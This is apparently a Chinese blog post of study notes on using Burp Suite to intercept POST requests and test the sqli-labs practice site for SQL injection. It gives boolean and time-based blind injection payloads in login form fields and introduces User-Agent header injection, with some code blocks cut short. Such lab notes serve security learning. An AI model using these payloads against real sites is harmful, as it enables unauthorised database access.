BP抓包,修改数据包探测注入点,结合提交的表单内容、cookie、UA、referer进行注入。
常见错误:
Burpsuite 打开了,代理截获功能也开启了,并监听 127.0.0.1 的 8080 端口,浏览器中也设置了代理为 127.0.0.1 的 8080 端口,但是在浏览器中 http://192.168.1.63/sqli-labs/ 页面可以正常打开。
原因:
浏览缓存所造成,由于浏览直接使用缓存的数据,并没向服务器发起请求,所以 Burpsuite并没有截获其请求。
解决:
1、可以再次刷新,或按 Ctrl+F5(强制刷新,不走本地缓存)
2、清除浏览器的缓存
1、POST方式注入:
1 | 1、开启截断抓包,Ctrl+R发送到Repeater中继器。 |
2、POST 方式的布尔型盲注
1 | uname=admin' and (length(database())=8)--+&passwd=admin&submit=Submit |
3、POST 方式的时间盲注
1 | uname=admin' and (select if(length(database())>1,sleep(3),null))--+&passwd=admin&submit=Submit |
4、HTTP 头的注入方式
HTTP 头注入原理:
HTTP 头中的参数被带入数据库中被执行就造成了 HTTP 头注入。
1 | 1、HTTP User-Agent 注入: |
本文作者:
kur08a
本文链接: https://kur08a.github.io/2022/03/27/%E4%BD%BF%E7%94%A8BP%E8%BF%9B%E8%A1%8CPOST%E5%9E%8BSQL%E6%B3%A8%E5%85%A5/
版权声明: 本作品采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议 进行许可。转载请注明出处!
本文链接: https://kur08a.github.io/2022/03/27/%E4%BD%BF%E7%94%A8BP%E8%BF%9B%E8%A1%8CPOST%E5%9E%8BSQL%E6%B3%A8%E5%85%A5/
版权声明: 本作品采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议 进行许可。转载请注明出处!
![知识共享许可协议](https://i.creativecommons.org/l/by-nc-sa/4.0/88x31.png)